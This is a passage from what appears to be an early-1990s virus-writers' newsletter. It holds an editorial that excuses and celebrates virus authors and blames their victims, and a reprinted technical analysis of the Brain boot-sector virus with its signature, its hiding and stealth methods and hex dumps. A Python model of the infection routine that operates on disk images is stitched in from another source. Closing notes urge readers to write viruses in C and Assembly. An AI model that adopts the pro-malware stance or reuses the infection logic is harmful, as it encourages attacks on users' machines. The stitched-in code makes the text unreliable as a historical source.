materials....If you take the proper precautions and steps, a virus attack
will never happen on your machine and if a real intelligent one comes along
that is able to sneak by a virus scanner and/or disable a virus scanner's
method(s) of scanning, and your hard drive is wiped clean, that's what back
ups are for. If you are one of those people who don't want to take the time
to backup, or think backing up is 'for wimps' (as someone had said once - I
am not sure if they were serious or not) when you lose everything just bend
over and kiss your sorry ass goodbye. Anyway, back to the topic of this
article: Why would someone want to write a virus? I already covered some of the
reasons why one would want to do this, and covered my reason why they do it.
The average virus writer writes his virus in the hopes some sap doesn't listen
to all the warnings and runs software downloaded from a BBS without scanning
it for a known virus first and gets hit by it. Then he sits there and laughs
his ass off. And I don't blame him. And as for all this law bullshit about
computer virii (The Computer Fraud And Abuse Act Of 1986) I have to laugh
about that, too....I don't really see computer virii as a major threat to
much of anything. It all depends on how you look at it I suppose. I see it
this way: A favorite book of yours gets stolen or destroyed. You have another
copy of it. Do you care about the stolen/destroyed one? Yes, slightly, but
not as much if the stolen/destroyed one had been your only copy. Same with
software. That's why I think the law(s) concerning virii is ridiculous. Now
only if they put that much effort into more serious crimes, like murder, rape
and drugs. In the article earlier, they mentioned a sentence of five years
in jail and a $250,000 fine...for what? Contaminating some bureaucrat's PC and
destroying his list of drugs growing in his backyard? And look at Robert T.
Morris Jr. He found a loophole in ARPANET, wrote and released a worm that
hogged all the memory and forced thousands of machines to be shut down for
up to ten days or so. So what? Did he deserve what they gave him? He was
thrown out of school, forced to pay $10,000 in fines, perform 400 hours of
community services, and was on 3 years probation. I do not agree with this
at all whatsoever. The reason why he got such a stiff sentence for such a
minor crime, if you can call it a crime at all, is because the government
had an interest in the network Morris interrupted. Morris didn't even have
malicious intent. They should be glad that HE, and not someone else who might
have had malicious destruction in mind, showed them the security loopholes in
the system. Instead they fine him, make him do community service (which was
probably cleaning some rich bureaucrat's pool or trimming his lawn) and place
him on 3 years probation hoping he fucked up again so they could make more
money and wouldn't have to worry about their lawns or pools for another few
weeks.
*****************************************************************************
*******************************
* Are Virii Really A Problem? *
* And For Whom? *
*******************************
This is a question I present to the bureaucrats and lawmakers: Are virii a
REAL problem? And for whom are they a problem? I think they are blowing the
whole thing way out of proportion and making people into criminals who are
not criminals. Let's say you rip out asbestos for a living, and you get
sick from it. Would you call the person that makes the asbestos a criminal?
No, of course not. Asbestos is just a hazard of the job. If your job deals
with computers, consider computer virii as just a hazard of the job. It's a
chance you take. If you don't want to take the risk, either find another
career or take the proper precautions to prevent a virus attack. Just like
the person who works with asbestos every day, he wears a mask, and gloves so
he doesn't get sick. So equip yourself with a real good scanner, be real
careful about where and who you get your software from and stop calling the
people who write virii 'criminals' and treating them like they are. Or if you
are too damn lazy to take the proper precautions, just have a backup at all
times. Should you get attacked by a virus, clean up the computer and install
everything again. I am, of course, referring to personal PCs...and not
mainframes, or networks....this is what I have to say about them: If Internet or
NASA's network should get attacked and disabled again, I say the institutions
and people who pay to use those networks should sue NASA or the people who
run Internet because they are the real criminals for not taking steps to make
sure this didn't happen again. It's kind of like this: If you left your front
door open with a $800 VCR and a $500 TV clearly in view, do you think it would
still be there when you got home? No, of course not, so you lock your door and
equip your home with an expensive alarm system. Why these people who scream
computer crime every time their system gets attacked don't have more secure
systems is beyond me. Instead of crying for anti-virus laws they should spend
more time making the security on their network or mainframe even tighter. The
answer to the question 'Are virii a REAL problem?' is NO....at least to me.
People make it into a problem. 'A problem for whom?' Lazy, virus illiterate people
who don't know any better....that don't bother securing their systems. To me
that's their own damn fault and THEY should be brought up on charges. Maybe
we should have a new law...'The virus ignorance law'
Section 51-A Of The Computer Fraud And Abuse Act Of 1986 Clearly States
That You, If Found Guilty Of Virus Ignorance, Could Be Sentenced To Up To 5
Years In Jail, $500,000 In Fines, 800 Hours Of Cleaning Virus Ridden Computers
And 2 Years Probation.
After all, wouldn't you consider sitting there with your head firmly wedged
up your ass as your computer gets invaded by a virus, computer abuse?
I do.
*****************************************************************************
This one is for Midnight Cowboy.
This was taken from a book and re-printed WITHOUT permission from the author.
*****************************************************************************
*******************************
* The Brain Virus: Fact And *
* Fantasy *
*******************************
The Brain virus has the distinction of being the first computer virus
to strike in the United States outside of a test laboratory. According
to Ms. Ann Webster of the Academic Computer Center of the University of
Delaware in Newark, Delaware, it was reported to the Computer Center on
October 22, 1987. It was found in other locations on the campus one or
two days later. It was named the Brain virus because it wrote that word
as the disk label on any floppy disk it attacked. After the initial
analysis of this computer virus on an infected disk two names, Basit and
Amjad, and their address in Lahore, Pakistan, were found. Because of this,
the virus has also been called the Pakistani virus. Many misconceptions
exist about this virus because of incomplete and/or inaccurate statements
that appeared in newspapers. Most of the newspaper and popular magazine
writers did not have any computer knowledge and some were eager to seek
"horror stories" so that their articles would be different. Even the
computer trade and professional publications have included errors in their
accounts of this virus. Some of the professional writers, both in the US
and abroad, based their articles on previously published information. Most
did not have a working copy of the Brain and even the few who did, failed
to fully analyze the actual program's code. In our Microcomputer Security
Laboratory we have several copies of the Brain virus obtained from
different sources. We have spent many hours running the Brain virus,
exploring its different methods of infection, testing its interaction with
different media and isolating the virus so that we could produce an
assembly language listing. We have also discussed its code and infection
methodology with virus researchers. Therefore we hope to clear up some
current confusion.
Some Characteristics of the Brain
----------------------------------
1. The brain has been called benign in the press. Yet, Ms. Webster reported
that the files on a number of infected disks were destroyed. The virus
at times was destructive. It is impossible to be both. This oxymoron can
be explained by the fact that the virus may remain on the floppy disk
without doing any damage. But at times it has been activated so that it
destroys the file allocation table (FAT) that provides information to the
operating system as to the location of all files on the disk. It would be
stretching the dictionary meaning of benign to say that because the
contents of the disk can be reconstructed, no damage has been done. To
understand the reconstruction problem, suppose we have a set of 30 company
reports, approximately 20 pages each, all typed within the same margins on
the same paper, not page numbered, not clipped, and with no other copy
available. Left near an open window, these 600 pages are blown over a
wide area with no order preserved. Now, put them back in order. Because
the actual data on the floppy disk have not been destroyed, it is
possible to use a utility, such as PC Tools, or the Norton Utilities, to read
each sector. The appropriate sectors can be moved to another disk in an
approximate sequence to replicate the original documents. This is a
delicate and tiresome task.
2. The Brain virus does not notify the user that the disk has been infected
immediately before it ruins a disk. The user is never made aware that the
disk has been infected. The virus can remain on an infected disk without
damaging it, but there is always a risk of unannounced disaster.
3. There is NO ransom demand made by the Brain (See Note 1).
4. The Brain virus code is written so that it will never infect a hard disk.
It is media specific; it will attack only double-sided, nine sectored
floppy disks that have been formatted under some version of DOS.
5. The virus can infect a microcomputer and spread to floppy disks even if
the boot disk is NOT infected. If a non-bootable infected disk is used
in an attempt to boot a system, the following message will be displayed
on the screen:
Please Insert A Bootable Disk
Then Type [Return]
By that time the virus has already hidden itself in RAM memory. Using a
clean bootable disk to start the system will result in that disk
becoming infected. (See Note 2). The virus will then spread to any other
floppy used on the system.
6. The virus appears to be unstable. The actual code is some 4100 bytes but
less than half of it is actually executed. Two portions of the program
are neither called nor can many researchers determine under what
circumstances they would be executed. Was the extra code inserted to confuse
anyone who disassembled the program? Is there some way that either or
both uncalled parts are involved that has thus far been undiscovered?
7. The virus source code contains a counter. The counter is reset often and
it is difficult to determine its purpose. Because the counter was not
mentioned in published reports about the Brain, "new" viruses appeared.
Some companies whose disks were attacked discovered the counter and de-
cided that they had a new virus. When similarities to the Brain were
found it was decided that the new viruses were hacker versions of the
original found at the University of Delaware. Whether there are hacker
versions or destruction was caused by the unstable character of the Brain
is a question. Certainly it is not difficult for an experienced
programmer who has obtained a copy of the Brain to modify its code.
Note 1: In the January 31, 1988, issue of The New York Times, the article
about computer viruses contained the following: "Buried within the
code of the virus discovered at the University of Delaware was an
apparent ransom demand: Computer users who discovered the virus were
told to send $2,000 to an address in Pakistan to obtain an immunity
program, according to Harold Highland....The Pakistani contact was
not identified." This statement was never made by me and Vin McLellan
and the author of The New York Times article admits that it was never
made. Somewhere in the copy preparation and/or editing, the copy was
altered. In our discussion, I noted that the names of the authors and
their addresses in Lahore, Pakistan, were found in the virus and that
there was even a copyright notice. Because of other writers' use of the
database of newspaper articles about viruses, several picked this
quote up and used it without any verification. It has appeared in
several major newspapers in the States as well as in newspapers and the
computer trade press abroad.
Note 2: This note is my own, and was not in the original article. I noticed
that the author of this article had said that other articles
released on the Brain virus had errors in them. I also noticed that his
article had an error in it, too. He said:
By that time the virus has already hidden itself in RAM memory. Using a
clean bootable disk to start the system will result in that disk
becoming infected. (See Note 2). The virus will then spread to any other
floppy used on the system.
Now, this is not possible. If you do a "warm boot" the virus may be
able to survive and infect that clean bootable disk. BUT if you do
a "cold boot" and wait fifteen seconds before you turn the machine
back on, there is no possible way for the virus to infect that disk.
Once you shut the machine off, RAM is empty. NOTHING can possibly
survive in RAM after the machine has been shut off. Even if you did
do a warm boot, and the virus survived, just have that clean boot
disk write protected and the virus won't be able to infect it.
How The Virus Infects A Disk
-----------------------------
When a Brain infected disk is inserted into a system, the virus first copies
itself to the highest area in memory. It resets the memory size by altering
interrupt vector A2H so as to protect the RAM resident virus. It also resets
interrupt vector 13H to point to the virus code in high memory and resets
interrupt vector 6H (unused under existing versions of DOS) to point to the
original interrupt vector, 13H. After that the normal boot process continues
with the loading of both IBMBIO.COM and IBMDOS.COM under PC-DOS or IO.SYS and
MSDOS.SYS under MS-DOS. The infected disk contains a message and part of the
virus code in the boot sector. The remainder of the code and a copy of the
original boot sector is contained in three clusters (six sectors) that the
virus has labeled "bad" in the FAT. Figure 1 shows a map of an infected disk
obtained by using Central Point Software's PC Tools Deluxe.
Figure 1:
-----------------------------------------------------------------------------
Entire Disk Mapped 80% free space
Track 1 1 2 2 3 3 3
Double Sided 0 5 0 5 0 5 0 5 9
Booooo.....+++++++++++++++++++++++++++++++
Side 0 Fooooo.....+++++++++++++++++++++++++++++++
Fooooo..X..+++++++++++++++++++++++++++++++
Doooooo.X..+++++++++++++++++++++++++++++++
-----------Doooooo.X..+++++++++++++++++++++++++++++++
Dooooo.....+++++++++++++++++++++++++++++++
Side 1 oooooo.....+++++++++++++++++++++++++++++++
oooooo.....+++++++++++++++++++++++++++++++
oooooo.....+++++++++++++++++++++++++++++++
Explanation Of Codes:
+ Available . Allocated
B Boot Record o Hidden
F File Alloc. Table r Read Only
D Directory X Bad Cluster
-----------------------------------------------------------------------------
With the virus in upper RAM it is not possible to read the infected boot
sector. If an attempt is made to read the boot sector, the Brain re-directs
the request to read the original boot sector that is stored in one of the
bad sectors. The only way to read the Brain message contained in the boot
sector is to boot a system with a non-infected disk, preferably with a write
protect tab. Replace the boot disk with a write protected version of PC Tools
and place an infected disk in drive B. Figure 2 shows the embedded message by
using PC Tools to read the infected disk's boot sector.
Figure 2:
-----------------------------------------------------------------------------
Displacement -----------------HEX Values-------------------- ASCII Value
0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F Welcome to
0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20 the Dungeon
0048 (0030) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0064 (0040) 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
0080 (0050) 20 28 63 29 20 31 39 38 36 20 42 61 73 69 74 20 (C) 1986 Basit
0096 (0060) 26 20 41 6D 6A 61 64 20 28 70 76 74 29 20 4C 74 & Amjad (pvt) Lt
0112 (0070) 64 2E 20 20 20 20 20 20 20 20 20 20 20 20 20 20 d
0128 (0080) 20 42 52 41 49 4E 20 43 4F 4D 50 55 54 45 52 20 BRAIN COMPUTER
0144 (0090) 53 45 52 56 49 43 45 53 2E 2E 37 33 30 20 4E 49 SERVICES 730 NI
0160 (00A0) 54 41 4D 20 42 4C 4F 43 4B 20 41 4C 4C 41 4D 41 ZAM BLOCK ALLAMA
0176 (00B0) 20 49 51 42 41 4C 20 54 4F 57 4E 20 20 20 20 20 IGBAL TOWN
0192 (00C0) 20 20 20 20 20 20 20 20 20 20 20 4C 41 48 4F 52 LAHOR
0208 (00D0) 45 2D 50 41 4B 49 53 54 41 4E 2E 2E 50 48 4F 4E E-PAKISTAN PHON
0224 (00E0) 45 20 3A 34 33 30 37 39 31 2C 34 34 33 32 34 38 E 430791.443248
0240 (00F0) 2C 32 38 30 35 33 30 2E 20 20 20 20 20 20 20 20 .280530
0256 (0100) 20 20 42 65 77 61 72 65 20 6F 66 20 74 68 69 73 Beware of this
0272 (0110) 20 56 49 52 55 53 2E 2E 2E 2E 2E 43 6F 6E 74 61 VIRUS.....Conta
0288 (0120) 63 74 20 75 73 20 66 6F 72 20 76 61 63 63 69 6E ct us for vaccin
0304 (0130) 61 74 69 6F 6E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E 2E ation.......
-----------------------------------------------------------------------------
The virus, residing in high memory, intercepts any disk READ request. If that
request is not for the boot sector or a non-floppy drive, the virus reads the
boot sector of the disk. It examines the 4th and 5th bytes for "1234" that are
stored as 34 12, the signature of the Brain. If that signature is not present
on the floppy disk, the virus infects the disk then proceeds with the READ
command. If the disk is already infected, the virus does not re-infect the
disk but instead continues with the READ. Also if the disk is write protected,
the infection will be terminated. Figure 3 is a comparison of the initial
portion of a good and an infected boot sector.
Figure 3:
-----------------------------------------------------------------------------
GOOD Boot Sector:
Displacement -----------------HEX Values--------------------
0000 (0000) EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00
0016 (0010) 02 70 00 D0 02 FD 02 00 09 00 02 00 00 00 00 00
0032 (0020) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
BAD Boot Sector:
Displacement -----------------HEX Values--------------------
0000 (0000) FA E9 4A 01 34 12 01 02 27 00 01 00 00 00 00 20
0016 (0010) 20 20 20 20 20 20 57 65 6C 63 6F 6D 65 20 74 6F
0032 (0020) 20 74 68 65 20 44 75 6E 67 65 6F 6E 20 20 20 20
-----------------------------------------------------------------------------
Normally the virus, in its attempt to infect a disk, will search for three
consecutive clusters it can mark as "bad". If there are no blank clusters, the
virus will not infect the disk. However, if there is only one blank cluster
and it is neither of the last two clusters on the disk, the virus will select
the one blank cluster and overwrite the next two clusters and mark all three
as bad. If the overwritten material is part of a file, that file no longer can
be executed if it is a program, or read if it is a data file. This is one way
in which a user might learn that a disk has been infected.
Poor Man's Filter
-----------------
In our laboratory testing we found a simple, inexpensive method to protect a
disk from becoming infected by the Brain virus by checking if the virus is in
high memory. It is possible to prepare a test disk by following these simple
steps.
1. Format a floppy disk with or without a system.
2. Use DEBUG.COM or PC Tools to edit the boot sector. The first line of the
boot sector appears as:
EB 34 90 49 42 4D 20 20 33 2E 32 00 02 02 01 00
            -----
3. Since the Brain examines the fifth and sixth bytes for its signature,
change those bytes to the virus' signature, 1234. Below is an altered
first line of a boot sector:
EB 34 90 49 34 12 20 20 33 2E 32 00 02 02 01 00
            -----
Place this altered test disk in drive B and after the system prompt, A>,
type: DIR B: to obtain a directory of the test disk. If the system is infected
by the Brain virus, the following message will appear on the screen:
Not ready, error reading Drive B Abort, Retry, Ignore?
The disk with the altered boot sector will work only on a non-infected system.
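The following is an added example; it is not code from this newsletter, from the book the article is reprinted from, or from the Brain itself. It models, in Python, the three things the article describes so they can be checked against a disk image offline: the signature test the resident virus makes on every floppy read (bytes 4-5 equal to 34 12), the placement rule for the three "bad" clusters that hide the rest of the body and the original boot sector, and the Poor Man's Filter that plants the signature on a clean disk. The 360K FAT12 image is constructed from the GOOD boot sector bytes in Figure 3; the infected boot sector head and the "Welcome to the Dungeon" text come from Figures 2 and 3. The memory-resident side (the INT 13H hook itself) is not modelled, the geometry is taken from the article's statement that the virus is media specific, and the placement of the saved boot sector in the first of the three hidden clusters is an assumption, not something the article states.

```python
# Added example, not from the newsletter or from the Brain's own code: an offline
# model of the behaviour the article describes, on a constructed 360K FAT12 image.
import struct

SECTOR = 512
BRAIN_SIG = b"\x34\x12"   # bytes 4-5 of an infected boot sector ("1234", little-endian)
FAT12_BAD = 0xFF7         # FAT12 entry value that marks a cluster "bad"
# First 32 bytes of Figure 3's GOOD boot sector (PC-DOS 3.2, 360K diskette).
GOOD_BOOT = bytes.fromhex("EB3490 49424D2020332E32 0002 02 0100 02 7000 D002 FD 0200 0900 0200 00000000")
BAD_BOOT = bytes.fromhex("FAE94A01 3412 0102 2700 0100 000000 20")   # Figure 3, infected, first 16 bytes
BPB_FIELDS = ("bytes_per_sector", "sectors_per_cluster", "reserved", "fats", "root_entries",
              "total_sectors", "media", "sectors_per_fat", "sectors_per_track", "heads")

def parse_bpb(boot):
    """Decode the BIOS Parameter Block at offset 11 of a DOS boot sector."""
    return dict(zip(BPB_FIELDS, struct.unpack_from("<HBHBHHBHHH", boot, 11)))

# Brain is media specific (item 4 above), so the 360K layout is fixed for everything below.
BPB = parse_bpb(GOOD_BOOT)
DATA_START = BPB["reserved"] + BPB["fats"] * BPB["sectors_per_fat"] + BPB["root_entries"] * 32 // SECTOR
CLUSTERS = (BPB["total_sectors"] - DATA_START) // BPB["sectors_per_cluster"]   # numbered 2..CLUSTERS+1
FAT_SLICES = [slice(s, s + BPB["sectors_per_fat"] * SECTOR) for s in
              ((BPB["reserved"] + i * BPB["sectors_per_fat"]) * SECTOR for i in range(BPB["fats"]))]

def fat12_get(fat, n):
    off = n * 3 // 2
    v = fat[off] | (fat[off + 1] << 8)
    return v >> 4 if n & 1 else v & 0xFFF
def fat12_set(fat, n, val):
    off = n * 3 // 2
    if n & 1:
        fat[off] = (fat[off] & 0x0F) | ((val << 4) & 0xF0)
        fat[off + 1] = (val >> 4) & 0xFF
    else:
        fat[off] = val & 0xFF
        fat[off + 1] = (fat[off + 1] & 0xF0) | ((val >> 8) & 0x0F)

def cluster_offset(n):
    return (DATA_START + (n - 2) * BPB["sectors_per_cluster"]) * SECTOR
def build_clean_image():
    """Constructed, freshly formatted disk: Figure 3 boot sector, empty FATs and root."""
    img = bytearray(BPB["total_sectors"] * SECTOR)
    img[:len(GOOD_BOOT)] = GOOD_BOOT
    for sl in FAT_SLICES:
        img[sl.start:sl.start + 3] = b"\xFD\xFF\xFF"   # media byte plus filler, as FORMAT writes
    return img

def is_infected(boot):
    """The test the resident virus makes on every floppy read."""
    return bytes(boot[4:6]) == BRAIN_SIG
def inoculate(boot):
    """Poor Man's Filter: plant the signature so the virus treats the disk as already its own."""
    boot = bytearray(boot)
    boot[4:6] = BRAIN_SIG
    return bytes(boot)

def bad_cluster_runs(fat):
    """Runs of consecutive clusters marked bad; a fresh Brain infection leaves one run of three."""
    runs, start = [], None
    for n in range(2, CLUSTERS + 3):          # CLUSTERS + 2 is a sentinel that flushes the last run
        bad = n < CLUSTERS + 2 and fat12_get(fat, n) == FAT12_BAD
        if bad and start is None:
            start = n
        elif not bad and start is not None:
            runs.append((start, n - start)); start = None
    return runs

def choose_hiding_clusters(fat):
    """The article's placement rule. Returns (first cluster, overwrites_neighbours) or None."""
    last = CLUSTERS + 1
    free = [n for n in range(2, last + 1) if fat12_get(fat, n) == 0]
    for a, b, c in zip(free, free[1:], free[2:]):
        if (b, c) == (a + 1, a + 2):
            return a, False                   # three consecutive free clusters
    if len(free) == 1 and free[0] <= last - 2:
        return free[0], True                  # lone free cluster: the next two get overwritten
    return None                               # nothing usable (other layouts are not described)

def intercept_read(img, write_protected=False):
    """What the resident Brain does before a floppy read goes through; True if it infected."""
    boot = bytes(img[:SECTOR])
    if write_protected or is_infected(boot):
        return False
    fats = [memoryview(img)[sl] for sl in FAT_SLICES]
    spot = choose_hiding_clusters(fats[0])
    if spot is None:
        return False
    first = spot[0]
    # Assumption: the saved boot sector occupies the first of the three hidden clusters.
    img[cluster_offset(first):cluster_offset(first) + SECTOR] = boot
    head = bytearray(SECTOR)
    head[:len(BAD_BOOT)] = BAD_BOOT
    head[0x16:0x2C] = b"Welcome to the Dungeon"   # the text shown in Figure 2
    img[:SECTOR] = head
    for fat in fats:
        for n in range(first, first + 3):
            fat12_set(fat, n, FAT12_BAD)
    return True

def stealth_read_boot(img):
    """A read of sector 0 while the virus is resident: it hands back the saved original."""
    if not is_infected(img[:SECTOR]):
        return bytes(img[:SECTOR])
    first = bad_cluster_runs(memoryview(img)[FAT_SLICES[0]])[0][0]
    return bytes(img[cluster_offset(first):cluster_offset(first) + SECTOR])
```

Against a raw dump of a real 360K diskette, is_infected(img[:512]) and bad_cluster_runs(...) give the two signals a scanner of the period would look for: 34 12 at bytes 4-5, and a single run of exactly three bad clusters present in both FATs. intercept_read on a write-protected image returns False and leaves it untouched, which is the behaviour the article's item 5 and Note 2 rely on, and stealth_read_boot shows why the Dungeon text is invisible on an infected system. Note that the inoculation only works against a virus that checks exactly these two bytes; the "hacker versions" of item 7 need not.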
*****************************************************************************
The Alvi brothers, Basit and Amjad, sell compatible PCs in their store in
Lahore, Pakistan. When contacted by a reporter for "The Chronicle of Higher
Education," the 19-year old Basit Alvi admitted writing the virus and placing
it on a disk in 1986 "for fun." He reportedly gave a copy of the virus prog-
ram to a friend, another student. However, both brothers were at a loss in
explaining how the virus emigrated to the States.
*****************************************************************************
Final Notes:
------------
Thanks to Midnight Cowboy for writing those articles and showing interest in
the newsletter. Sorry I did not include them but I came to the conclusion
that there is not much use for batch file virii when there are languages such
as C and Assembly. I do appreciate the effort, though.
Someone was SUPPOSED to write me a article for the Sample Source Code Dept.
on Pascal virii, but they never did it for me, just wanted to say thanks to
that person.
I got some bad feedback on my last issue of Viriisearch, and needless to say
I didn't like it too much. This person didn't like the fact that I had gone
over the C source code to ATTRB as much as I did. Well, I decided to go over
the source code really well because ATTRB is a well written program, as well
as a simple program, so I figured it would make you non C programmers
interested in C, and for you beginner C programmers, it would make you into a
better C programmer. What I covered on ATTRB last issue took me quite a while to
learn on my own and the knowledge is there for the taking. If you didn't like
it because you didn't understand it, I suggest you start learning C or
Assembly because those are, most likely, the only programming languages you
will find in this newsletter. And what does an attributes program have to do
with virii?
Well, a lot of virii do have to change attributes on files and there was a
very well written, tight program to do it, in the last issue.
Speaking of feedback, the more the better. Starting in the next issue, #4, I
will be featuring readers' feedback, which I will reply to. Provided I get
enough feedback.
I hope you enjoyed this issue of "Viriisearch" The newsletter dedicated
entirely to computer virii.
Until Next Time......Be Careful!!!
* Criminal Minded <tm> *
-----------------------------------------------------------------------------